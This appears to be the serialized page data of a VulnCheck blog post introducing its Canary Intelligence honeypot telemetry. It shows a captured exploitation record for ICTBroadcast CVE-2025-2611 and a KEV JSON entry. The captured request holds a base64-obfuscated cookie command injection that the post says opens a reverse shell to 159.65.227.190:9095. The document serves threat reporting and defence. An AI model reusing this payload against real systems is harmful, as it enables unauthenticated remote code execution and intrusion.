\"category\": \"Web Application Attack\",\n \"severity\": 1,\n \"payload\": \"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV83KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTMxLjAuMC4wIFNhZmFyaS81MzcuMzYNCkNvb2tpZTogQlJPQURDQVNUPWBlY2hvJHtJRlN9YzJnZ0xXa2dQaVlnTDJSbGRpOTBZM0F2TVRVNUxqWTFMakl5Tnk0eE9UQXZPVEE1TlNBd1BpWXh8YmFzZTY0JHtJRlN9LWR8c2hgDQoNCg==\",\n \"http\": {\n \"url\": \"\u002Flogin.php\",\n \"http_user_agent\": \"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36\",\n \"protocol\": \"HTTP\u002F1.1\"\n },\n \"timestamp\": \"2025-11-01T12:03:20.969Z\"\n },\n",[886,28221,28222,28227,28246,28261,28279,28297,28315,28329,28347,28365,28379,28398,28410,28429,28448,28464,28469,28486],{"__ignoreMap":219},[1373,28223,28224],{"class":1375,"line":1376},[1373,28225,28226],{"class":1383}," {\n",[1373,28228,28229,28231,28233,28235,28237,28239,28242,28244],{"class":1375,"line":220},[1373,28230,26357],{"class":9152},[1373,28232,23735],{"class":9155},[1373,28234,183],{"class":9152},[1373,28236,4606],{"class":1383},[1373,28238,4883],{"class":9173},[1373,28240,28241],{"class":9176},"159.65.227.190",[1373,28243,183],{"class":9173},[1373,28245,9062],{"class":1383},[1373,28247,28248,28250,28252,28254,28256,28259],{"class":1375,"line":1266},[1373,28249,26357],{"class":9152},[1373,28251,23754],{"class":9155},[1373,28253,183],{"class":9152},[1373,28255,4606],{"class":1383},[1373,28257,28258],{"class":5467}," 38761",[1373,28260,9062],{"class":1383},[1373,28262,28263,28265,28267,28269,28271,28273,28275,28277],{"class":1375,"line":1852},[1373,28264,26357],{"class":9152},[1373,28266,23770],{"class":9155},[1373,28268,183],{"class":9152},[1373,28270,4606],{"class":1383},[1373,28272,4883],{"class":9173},[1373,28274,23799],{"class":9176},[1373,28276,183],{"class":9173},[1373,28278,9062],{"class":1383},[1373,28280,28281,28283,28285,28287,28289,28291,28293,28295],{"class":1375,"line":4692},[1373,28282,26357],{"class":9152},[1373,28284,23790],{"class":9155},[1373,28286,183],{"class":9152},[1373,28288,4606],{"class":1383},[1373,28290,4883],{"class":9173},[1373,28292,23799],{"class":9176},[1373,28294,183],{"class":9173},[1373,28296,9062],{"class":1383},[1373,28298,28299,28301,28303,28305,28307,28309,28311,28313],{"class":1375,"line":4724},[1373,28300,26357],{"class":9152},[1373,28302,242],{"class":9155},[1373,28304,183],{"class":9152},[1373,28306,4606],{"class":1383},[1373,28308,4883],{"class":9173},[1373,28310,23717],{"class":9176},[1373,28312,183],{"class":9173},[1373,28314,9062],{"class":1383},[1373,28316,28317,28319,28321,28323,28325,28327],{"class":1375,"line":4756},[1373,28318,26357],{"class":9152},[1373,28320,23828],{"class":9155},[1373,28322,183],{"class":9152},[1373,28324,4606],{"class":1383},[1373,28326,23835],{"class":5467},[1373,28328,9062],{"class":1383},[1373,28330,28331,28333,28335,28337,28339,28341,28343,28345],{"class":1375,"line":4768},[1373,28332,26357],{"class":9152},[1373,28334,23844],{"class":9155},[1373,28336,183],{"class":9152},[1373,28338,4606],{"class":1383},[1373,28340,4883],{"class":9173},[1373,28342,23853],{"class":9176},[1373,28344,183],{"class":9173},[1373,28346,9062],{"class":1383},[1373,28348,28349,28351,28353,28355,28357,28359,28361,28363],{"class":1375,"line":4792},[1373,28350,26357],{"class":9152},[1373,28352,23864],{"class":9155},[1373,28354,183],{"class":9152},[1373,28356,4606],{"class":1383},[1373,28358,4883],{"class":9173},[1373,28360,23873],{"class":9176},[1373,28362,183],{"class":9173},[1373,28364,9062],{"class":1383},[1373,28366,28367,28369,28371,28373,28375,28377],{"class":1375,"line":4798},[1373,28368,26357],{"class":9152},[1373,28370,23884],{"class":9155},[1373,28372,183],{"class":9152},[1373,28374,4606],{"class":1383},[1373,28376,5468],{"class":5467},[1373,28378,9062],{"class":1383},[1373,28380,28381,28383,28385,28387,28389,28391,28394,28396],{"class":1375,"line":4806},[1373,28382,26357],{"class":9152},[1373,28384,11736],{"class":9155},[1373,28386,183],{"class":9152},[1373,28388,4606],{"class":1383},[1373,28390,4883],{"class":9173},[1373,28392,28393],{"class":9176},"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV83KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTMxLjAuMC4wIFNhZmFyaS81MzcuMzYNCkNvb2tpZTogQlJPQURDQVNUPWBlY2hvJHtJRlN9YzJnZ0xXa2dQaVlnTDJSbGRpOTBZM0F2TVRVNUxqWTFMakl5Tnk0eE9UQXZPVEE1TlNBd1BpWXh8YmFzZTY0JHtJRlN9LWR8c2hgDQoNCg==",[1373,28395,183],{"class":9173},[1373,28397,9062],{"class":1383},[1373,28399,28400,28402,28404,28406,28408],{"class":1375,"line":4817},[1373,28401,26357],{"class":9152},[1373,28403,6277],{"class":9155},[1373,28405,183],{"class":9152},[1373,28407,4606],{"class":1383},[1373,28409,4765],{"class":1383},[1373,28411,28412,28415,28417,28419,28421,28423,28425,28427],{"class":1375,"line":4825},[1373,28413,28414],{"class":9152}," \"",[1373,28416,7585],{"class":9165},[1373,28418,183],{"class":9152},[1373,28420,4606],{"class":1383},[1373,28422,4883],{"class":9173},[1373,28424,23938],{"class":9176},[1373,28426,183],{"class":9173},[1373,28428,9062],{"class":1383},[1373,28430,28431,28433,28435,28437,28439,28441,28444,28446],{"class":1375,"line":4835},[1373,28432,28414],{"class":9152},[1373,28434,23949],{"class":9165},[1373,28436,183],{"class":9152},[1373,28438,4606],{"class":1383},[1373,28440,4883],{"class":9173},[1373,28442,28443],{"class":9176},"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36",[1373,28445,183],{"class":9173},[1373,28447,9062],{"class":1383},[1373,28449,28450,28452,28454,28456,28458,28460,28462],{"class":1375,"line":4843},[1373,28451,28414],{"class":9152},[1373,28453,23969],{"class":9165},[1373,28455,183],{"class":9152},[1373,28457,4606],{"class":1383},[1373,28459,4883],{"class":9173},[1373,28461,26002],{"class":9176},[1373,28463,19057],{"class":9173},[1373,28465,28466],{"class":1375,"line":4849},[1373,28467,28468],{"class":1383}," },\n",[1373,28470,28471,28473,28475,28477,28479,28481,28484],{"class":1375,"line":4877},[1373,28472,26357],{"class":9152},[1373,28474,23992],{"class":9155},[1373,28476,183],{"class":9152},[1373,28478,4606],{"class":1383},[1373,28480,4883],{"class":9173},[1373,28482,28483],{"class":9176},"2025-11-01T12:03:20.969Z",[1373,28485,19057],{"class":9173},[1373,28487,28488,28490],{"class":1375,"line":4915},[1373,28489,28032],{"class":1383},[1373,28491,9062],{"class":4640},[18,28493,28494,28495,28498],{},"In this event, we identified that 159.65.227.190 (US) targeted a canary in the US via ",[47,28496,23717],{"href":23715,"rel":28497},[51],". The payload field is base64-encoded to preserve special characters; when decoded, the request body shows the exploit delivered through the Cookie header:",[1354,28500,28502],{"className":22307,"code":28501,"language":22309,"meta":219,"style":219},"GET \u002Flogin.php HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36\nCookie: BROADCAST=`echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTU5LjY1LjIyNy4xOTAvOTA5NSAwPiYx|base64${IFS}-d|sh`\n",[886,28503,28504,28511,28516,28562],{"__ignoreMap":219},[1373,28505,28506,28509],{"class":1375,"line":1376},[1373,28507,28508],{"class":4640},"GET \u002Flogin.php HTTP\u002F",[1373,28510,6295],{"class":5467},[1373,28512,28513],{"class":1375,"line":220},[1373,28514,28515],{"class":4640},"Host: VC_REDACTED\n",[1373,28517,28518,28521,28524,28527,28529,28532,28535,28537,28539,28542,28545,28548,28551,28553,28556,28559],{"class":1375,"line":1266},[1373,28519,28520],{"class":4640},"User-Agent: Mozilla\u002F",[1373,28522,28523],{"class":5467},"5.0",[1373,28525,28526],{"class":4640}," (Macintosh; Intel Mac OS X ",[1373,28528,24698],{"class":5467},[1373,28530,28531],{"class":4640},"_",[1373,28533,28534],{"class":5467},"15",[1373,28536,28531],{"class":4640},[1373,28538,423],{"class":5467},[1373,28540,28541],{"class":4640},") AppleWebKit\u002F",[1373,28543,28544],{"class":5467},"537.36",[1373,28546,28547],{"class":4640}," (KHTML, like Gecko) Chrome\u002F",[1373,28549,28550],{"class":5467},"131.0",[1373,28552,59],{"class":4640},[1373,28554,28555],{"class":5467},"0.0",[1373,28557,28558],{"class":4640}," Safari\u002F",[1373,28560,28561],{"class":5467},"537.36\n",[1373,28563,28564,28567,28569,28573,28576,28579,28581,28584,28586,28589,28592,28595,28597,28600,28602,28605,28607,28610,28612,28615,28617,28620,28623,28625,28627,28629,28631],{"class":1375,"line":1852},[1373,28565,28566],{"class":4640},"Cookie: BROADCAST=`echo$",[1373,28568,9149],{"class":1383},[1373,28570,28572],{"class":28571},"s4fT8","IFS",[1373,28574,28575],{"class":1383},"}",[1373,28577,28578],{"class":4640},"c",[1373,28580,353],{"class":5467},[1373,28582,28583],{"class":4640},"ggLWkgPiYgL",[1373,28585,353],{"class":5467},[1373,28587,28588],{"class":4640},"Rldi",[1373,28590,28591],{"class":5467},"90",[1373,28593,28594],{"class":4640},"Y",[1373,28596,491],{"class":5467},[1373,28598,28599],{"class":4640},"AvMTU",[1373,28601,401],{"class":5467},[1373,28603,28604],{"class":4640},"LjY",[1373,28606,467],{"class":5467},[1373,28608,28609],{"class":4640},"LjIyNy",[1373,28611,380],{"class":5467},[1373,28613,28614],{"class":4640},"xOTAvOTA",[1373,28616,401],{"class":5467},[1373,28618,28619],{"class":4640},"NSAwPiYx|base",[1373,28621,28622],{"class":5467},"64",[1373,28624,4644],{"class":4640},[1373,28626,9149],{"class":1383},[1373,28628,28572],{"class":28571},[1373,28630,28575],{"class":1383},[1373,28632,28633],{"class":4640},"-d|sh`\n",[18,28635,28636],{},"Decoded and interpreted, the attacker base64-decodes a payload and pipes it to sh, yielding a reverse shell back to 159.65.227.190:9095.",[18,28638,28639],{},"From a single record, Canary Intelligence customers can therefore:",[22,28641,28642,28645,28648,28651],{},[25,28643,28644],{},"Attribute activity to a source IP and country, and a targeted geography",[25,28646,28647],{},"Associate the IP with a specific CVE being exploited",[25,28649,28650],{},"Recover the raw payload and any embedded C2 addresses",[25,28652,28653],{},"Determine if the event was generated by a scanning tool like Nuclei or a true exploitation attempt",[18,28655,28656],{},"We expose Canary telemetry in five indices by retention window: vulncheck-canaries-3d, vulncheck-canaries-10d, vulncheck-canaries-30d, vulncheck-canaries-90d, and vulncheck-canaries (the full, historical index). Customers can query these indices via API or download offline backups for enrichment, correlation, and threat-hunting workflows.",[61,28658,28660],{"id":28659},"how-existing-vulncheck-products-are-updated","How Existing VulnCheck Products Are Updated",[18,28662,28663],{},"VulnCheck Canary Intelligence seamlessly integrates across the existing VulnCheck product line, expanding context and precision across datasets.",[993,28665,28667],{"id":28666},"vulncheck-community","VulnCheck Community",[18,28669,28670],{},"Canary exploitation data is now surfaced directly in the freely available VulnCheck Known Exploited Vulnerability (KEV). Each CVE entry includes links to relevant Canary observations, a new Boolean field reported_exploited_by_vulncheck_canaries. Here is an example using the KEV entry for CVE-2025-2611:",[1354,28672,28674],{"className":22307,"code":28673,"language":22309,"meta":219,"style":219},"{\n \"vendorProject\": \"ICTBroadcast\",\n \"product\": \"ICTBroadcast\",\n \"shortDescription\": \"The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.\\n\\n\\n\\n\\nVersions 7.4 and below are known to be vulnerable.\",\n \"vulnerabilityName\": \" Improper Input Validation\",\n \"required_action\": \"Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.\",\n \"knownRansomwareCampaignUse\": \"Unknown\",\n \"cve\": [\n \"CVE-2025-2611\"\n ],\n \"cwes\": [],\n \"vulncheck_xdb\": [],\n \"vulncheck_reported_exploitation\": [\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-12\",\n \"date_added\": \"2025-10-12T11:12:37.803Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fictbroadcast-kev\",\n \"date_added\": \"2025-10-14T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-15\",\n \"date_added\": \"2025-10-15T13:16:43.284Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-20\",\n \"date_added\": \"2025-10-20T05:38:50.634Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-21\",\n \"date_added\": \"2025-10-21T11:28:34.748Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-22\",\n \"date_added\": \"2025-10-22T03:31:40.775Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-23\",\n \"date_added\": \"2025-10-23T06:40:46.346Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-29\",\n \"date_added\": \"2025-10-29T10:01:15.64Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-01\",\n \"date_added\": \"2025-11-01T12:03:20.969Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-03\",\n \"date_added\": \"2025-11-03T12:58:29.691Z\"\n }\n ],\n \"reported_exploited_by_vulncheck_canaries\": true,\n \"date_added\": \"2025-10-12T11:12:37.803Z\",\n \"_timestamp\": \"2025-11-03T13:27:52.697389321Z\"\n }\n ]\n}\n",[886,28675,28676,28680,28699,28718,28744,28764,28784,28804,28816,28824,28829,28842,28854,28867,28871,28891,28908,28913,28917,28935,28952,28956,28960,28979,28996,29000,29004,29023,29040,29044,29048,29067,29084,29088,29092,29111,29128,29132,29136,29155,29172,29176,29180,29199,29216,29220,29224,29243,29259,29263,29267,29286,29303,29307,29311,29326,29344,29361,29365,29370],{"__ignoreMap":219},[1373,28677,28678],{"class":1375,"line":1376},[1373,28679,8904],{"class":1383},[1373,28681,28682,28684,28687,28689,28691,28693,28695,28697],{"class":1375,"line":220},[1373,28683,26357],{"class":9152},[1373,28685,28686],{"class":9155},"vendorProject",[1373,28688,183],{"class":9152},[1373,28690,4606],{"class":1383},[1373,28692,4883],{"class":9173},[1373,28694,24695],{"class":9176},[1373,28696,183],{"class":9173},[1373,28698,9062],{"class":1383},[1373,28700,28701,28703,28706,28708,28710,28712,28714,28716],{"class":1375,"line":1266},[1373,28702,26357],{"class":9152},[1373,28704,28705],{"class":9155},"product",[1373,28707,183],{"class":9152},[1373,28709,4606],{"class":1383},[1373,28711,4883],{"class":9173},[1373,28713,24695],{"class":9176},[1373,28715,183],{"class":9173},[1373,28717,9062],{"class":1383},[1373,28719,28720,28722,28725,28727,28729,28731,28734,28737,28740,28742],{"class":1375,"line":1852},[1373,28721,26357],{"class":9152},[1373,28723,28724],{"class":9155},"shortDescription",[1373,28726,183],{"class":9152},[1373,28728,4606],{"class":1383},[1373,28730,4883],{"class":9173},[1373,28732,28733],{"class":9176},"The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.",[1373,28735,28736],{"class":2326},"\\n\\n\\n\\n\\n",[1373,28738,28739],{"class":9176},"Versions 7.4 and below are known to be vulnerable.",[1373,28741,183],{"class":9173},[1373,28743,9062],{"class":1383},[1373,28745,28746,28748,28751,28753,28755,28757,28760,28762],{"class":1375,"line":4692},[1373,28747,26357],{"class":9152},[1373,28749,28750],{"class":9155},"vulnerabilityName",[1373,28752,183],{"class":9152},[1373,28754,4606],{"class":1383},[1373,28756,4883],{"class":9173},[1373,28758,28759],{"class":9176}," Improper Input Validation",[1373,28761,183],{"class":9173},[1373,28763,9062],{"class":1383},[1373,28765,28766,28768,28771,28773,28775,28777,28780,28782],{"class":1375,"line":4724},[1373,28767,26357],{"class":9152},[1373,28769,28770],{"class":9155},"required_action",[1373,28772,183],{"class":9152},[1373,28774,4606],{"class":1383},[1373,28776,4883],{"class":9173},[1373,28778,28779],{"class":9176},"Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.",[1373,28781,183],{"class":9173},[1373,28783,9062],{"class":1383},[1373,28785,28786,28788,28791,28793,28795,28797,28800,28802],{"class":1375,"line":4756},[1373,28787,26357],{"class":9152},[1373,28789,28790],{"class":9155},"knownRansomwareCampaignUse",[1373,28792,183],{"class":9152},[1373,28794,4606],{"class":1383},[1373,28796,4883],{"class":9173},[1373,28798,28799],{"class":9176},"Unknown",[1373,28801,183],{"class":9173},[1373,28803,9062],{"class":1383},[1373,28805,28806,28808,28810,28812,28814],{"class":1375,"line":4768},[1373,28807,26357],{"class":9152},[1373,28809,242],{"class":9155},[1373,28811,183],{"class":9152},[1373,28813,4606],{"class":1383},[1373,28815,26352],{"class":1383},[1373,28817,28818,28820,28822],{"class":1375,"line":4792},[1373,28819,28414],{"class":9173},[1373,28821,23717],{"class":9176},[1373,28823,19057],{"class":9173},[1373,28825,28826],{"class":1375,"line":4798},[1373,28827,28828],{"class":1383}," ],\n",[1373,28830,28831,28833,28836,28838,28840],{"class":1375,"line":4806},[1373,28832,26357],{"class":9152},[1373,28834,28835],{"class":9155},"cwes",[1373,28837,183],{"class":9152},[1373,28839,4606],{"class":1383},[1373,28841,26338],{"class":1383},[1373,28843,28844,28846,28848,28850,28852],{"class":1375,"line":4817},[1373,28845,26357],{"class":9152},[1373,28847,22318],{"class":9155},[1373,28849,183],{"class":9152},[1373,28851,4606],{"class":1383},[1373,28853,26338],{"class":1383},[1373,28855,28856,28858,28861,28863,28865],{"class":1375,"line":4825},[1373,28857,26357],{"class":9152},[1373,28859,28860],{"class":9155},"vulncheck_reported_exploitation",[1373,28862,183],{"class":9152},[1373,28864,4606],{"class":1383},[1373,28866,26352],{"class":1383},[1373,28868,28869],{"class":1375,"line":4835},[1373,28870,9788],{"class":1383},[1373,28872,28873,28876,28878,28880,28882,28884,28887,28889],{"class":1375,"line":4843},[1373,28874,28875],{"class":9152}," \"",[1373,28877,7585],{"class":9165},[1373,28879,183],{"class":9152},[1373,28881,4606],{"class":1383},[1373,28883,4883],{"class":9173},[1373,28885,28886],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-12",[1373,28888,183],{"class":9173},[1373,28890,9062],{"class":1383},[1373,28892,28893,28895,28897,28899,28901,28903,28906],{"class":1375,"line":4849},[1373,28894,28875],{"class":9152},[1373,28896,12998],{"class":9165},[1373,28898,183],{"class":9152},[1373,28900,4606],{"class":1383},[1373,28902,4883],{"class":9173},[1373,28904,28905],{"class":9176},"2025-10-12T11:12:37.803Z",[1373,28907,19057],{"class":9173},[1373,28909,28910],{"class":1375,"line":4877},[1373,28911,28912],{"class":1383}," },\n",[1373,28914,28915],{"class":1375,"line":4915},[1373,28916,9788],{"class":1383},[1373,28918,28919,28921,28923,28925,28927,28929,28931,28933],{"class":1375,"line":4931},[1373,28920,28875],{"class":9152},[1373,28922,7585],{"class":9165},[1373,28924,183],{"class":9152},[1373,28926,4606],{"class":1383},[1373,28928,4883],{"class":9173},[1373,28930,24024],{"class":9176},[1373,28932,183],{"class":9173},[1373,28934,9062],{"class":1383},[1373,28936,28937,28939,28941,28943,28945,28947,28950],{"class":1375,"line":4947},[1373,28938,28875],{"class":9152},[1373,28940,12998],{"class":9165},[1373,28942,183],{"class":9152},[1373,28944,4606],{"class":1383},[1373,28946,4883],{"class":9173},[1373,28948,28949],{"class":9176},"2025-10-14T00:00:00Z",[1373,28951,19057],{"class":9173},[1373,28953,28954],{"class":1375,"line":4952},[1373,28955,28912],{"class":1383},[1373,28957,28958],{"class":1375,"line":6776},[1373,28959,9788],{"class":1383},[1373,28961,28962,28964,28966,28968,28970,28972,28975,28977],{"class":1375,"line":6781},[1373,28963,28875],{"class":9152},[1373,28965,7585],{"class":9165},[1373,28967,183],{"class":9152},[1373,28969,4606],{"class":1383},[1373,28971,4883],{"class":9173},[1373,28973,28974],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-15",[1373,28976,183],{"class":9173},[1373,28978,9062],{"class":1383},[1373,28980,28981,28983,28985,28987,28989,28991,28994],{"class":1375,"line":7524},[1373,28982,28875],{"class":9152},[1373,28984,12998],{"class":9165},[1373,28986,183],{"class":9152},[1373,28988,4606],{"class":1383},[1373,28990,4883],{"class":9173},[1373,28992,28993],{"class":9176},"2025-10-15T13:16:43.284Z",[1373,28995,19057],{"class":9173},[1373,28997,28998],{"class":1375,"line":7530},[1373,28999,28912],{"class":1383},[1373,29001,29002],{"class":1375,"line":7546},[1373,29003,9788],{"class":1383},[1373,29005,29006,29008,29010,29012,29014,29016,29019,29021],{"class":1375,"line":7571},[1373,29007,28875],{"class":9152},[1373,29009,7585],{"class":9165},[1373,29011,183],{"class":9152},[1373,29013,4606],{"class":1383},[1373,29015,4883],{"class":9173},[1373,29017,29018],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-20",[1373,29020,183],{"class":9173},[1373,29022,9062],{"class":1383},[1373,29024,29025,29027,29029,29031,29033,29035,29038],{"class":1375,"line":7598},[1373,29026,28875],{"class":9152},[1373,29028,12998],{"class":9165},[1373,29030,183],{"class":9152},[1373,29032,4606],{"class":1383},[1373,29034,4883],{"class":9173},[1373,29036,29037],{"class":9176},"2025-10-20T05:38:50.634Z",[1373,29039,19057],{"class":9173},[1373,29041,29042],{"class":1375,"line":7615},[1373,29043,28912],{"class":1383},[1373,29045,29046],{"class":1375,"line":7635},[1373,29047,9788],{"class":1383},[1373,29049,29050,29052,29054,29056,29058,29060,29063,29065],{"class":1375,"line":7640},[1373,29051,28875],{"class":9152},[1373,29053,7585],{"class":9165},[1373,29055,183],{"class":9152},[1373,29057,4606],{"class":1383},[1373,29059,4883],{"class":9173},[1373,29061,29062],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-21",[1373,29064,183],{"class":9173},[1373,29066,9062],{"class":1383},[1373,29068,29069,29071,29073,29075,29077,29079,29082],{"class":1375,"line":7648},[1373,29070,28875],{"class":9152},[1373,29072,12998],{"class":9165},[1373,29074,183],{"class":9152},[1373,29076,4606],{"class":1383},[1373,29078,4883],{"class":9173},[1373,29080,29081],{"class":9176},"2025-10-21T11:28:34.748Z",[1373,29083,19057],{"class":9173},[1373,29085,29086],{"class":1375,"line":7672},[1373,29087,28912],{"class":1383},[1373,29089,29090],{"class":1375,"line":7688},[1373,29091,9788],{"class":1383},[1373,29093,29094,29096,29098,29100,29102,29104,29107,29109],{"class":1375,"line":7709},[1373,29095,28875],{"class":9152},[1373,29097,7585],{"class":9165},[1373,29099,183],{"class":9152},[1373,29101,4606],{"class":1383},[1373,29103,4883],{"class":9173},[1373,29105,29106],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-22",[1373,29108,183],{"class":9173},[1373,29110,9062],{"class":1383},[1373,29112,29113,29115,29117,29119,29121,29123,29126],{"class":1375,"line":7714},[1373,29114,28875],{"class":9152},[1373,29116,12998],{"class":9165},[1373,29118,183],{"class":9152},[1373,29120,4606],{"class":1383},[1373,29122,4883],{"class":9173},[1373,29124,29125],{"class":9176},"2025-10-22T03:31:40.775Z",[1373,29127,19057],{"class":9173},[1373,29129,29130],{"class":1375,"line":7722},[1373,29131,28912],{"class":1383},[1373,29133,29134],{"class":1375,"line":9903},[1373,29135,9788],{"class":1383},[1373,29137,29138,29140,29142,29144,29146,29148,29151,29153],{"class":1375,"line":9908},[1373,29139,28875],{"class":9152},[1373,29141,7585],{"class":9165},[1373,29143,183],{"class":9152},[1373,29145,4606],{"class":1383},[1373,29147,4883],{"class":9173},[1373,29149,29150],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-23",[1373,29152,183],{"class":9173},[1373,29154,9062],{"class":1383},[1373,29156,29157,29159,29161,29163,29165,29167,29170],{"class":1375,"line":9913},[1373,29158,28875],{"class":9152},[1373,29160,12998],{"class":9165},[1373,29162,183],{"class":9152},[1373,29164,4606],{"class":1383},[1373,29166,4883],{"class":9173},[1373,29168,29169],{"class":9176},"2025-10-23T06:40:46.346Z",[1373,29171,19057],{"class":9173},[1373,29173,29174],{"class":1375,"line":9932},[1373,29175,28912],{"class":1383},[1373,29177,29178],{"class":1375,"line":9937},[1373,29179,9788],{"class":1383},[1373,29181,29182,29184,29186,29188,29190,29192,29195,29197],{"class":1375,"line":9957},[1373,29183,28875],{"class":9152},[1373,29185,7585],{"class":9165},[1373,29187,183],{"class":9152},[1373,29189,4606],{"class":1383},[1373,29191,4883],{"class":9173},[1373,29193,29194],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-29",[1373,29196,183],{"class":9173},[1373,29198,9062],{"class":1383},[1373,29200,29201,29203,29205,29207,29209,29211,29214],{"class":1375,"line":9962},[1373,29202,28875],{"class":9152},[1373,29204,12998],{"class":9165},[1373,29206,183],{"class":9152},[1373,29208,4606],{"class":1383},[1373,29210,4883],{"class":9173},[1373,29212,29213],{"class":9176},"2025-10-29T10:01:15.64Z",[1373,29215,19057],{"class":9173},[1373,29217,29218],{"class":1375,"line":15955},[1373,29219,28912],{"class":1383},[1373,29221,29222],{"class":1375,"line":16030},[1373,29223,9788],{"class":1383},[1373,29225,29226,29228,29230,29232,29234,29236,29239,29241],{"class":1375,"line":16035},[1373,29227,28875],{"class":9152},[1373,29229,7585],{"class":9165},[1373,29231,183],{"class":9152},[1373,29233,4606],{"class":1383},[1373,29235,4883],{"class":9173},[1373,29237,29238],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-01",[1373,29240,183],{"class":9173},[1373,29242,9062],{"class":1383},[1373,29244,29245,29247,29249,29251,29253,29255,29257],{"class":1375,"line":16083},[1373,29246,28875],{"class":9152},[1373,29248,12998],{"class":9165},[1373,29250,183],{"class":9152},[1373,29252,4606],{"class":1383},[1373,29254,4883],{"class":9173},[1373,29256,28483],{"class":9176},[1373,29258,19057],{"class":9173},[1373,29260,29261],{"class":1375,"line":16098},[1373,29262,28912],{"class":1383},[1373,29264,29265],{"class":1375,"line":16103},[1373,29266,9788],{"class":1383},[1373,29268,29269,29271,29273,29275,29277,29279,29282,29284],{"class":1375,"line":16147},[1373,29270,28875],{"class":9152},[1373,29272,7585],{"class":9165},[1373,29274,183],{"class":9152},[1373,29276,4606],{"class":1383},[1373,29278,4883],{"class":9173},[1373,29280,29281],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-03",[1373,29283,183],{"class":9173},[1373,29285,9062],{"class":1383},[1373,29287,29288,29290,29292,29294,29296,29298,29301],{"class":1375,"line":16153},[1373,29289,28875],{"class":9152},[1373,29291,12998],{"class":9165},[1373,29293,183],{"class":9152},[1373,29295,4606],{"class":1383},[1373,29297,4883],{"class":9173},[1373,29299,29300],{"class":9176},"2025-11-03T12:58:29.691Z",[1373,29302,19057],{"class":9173},[1373,29304,29305],{"class":1375,"line":16164},[1373,29306,9861],{"class":1383},[1373,29308,29309],{"class":1375,"line":16170},[1373,29310,28828],{"class":1383},[1373,29312,29313,29315,29318,29320,29322,29324],{"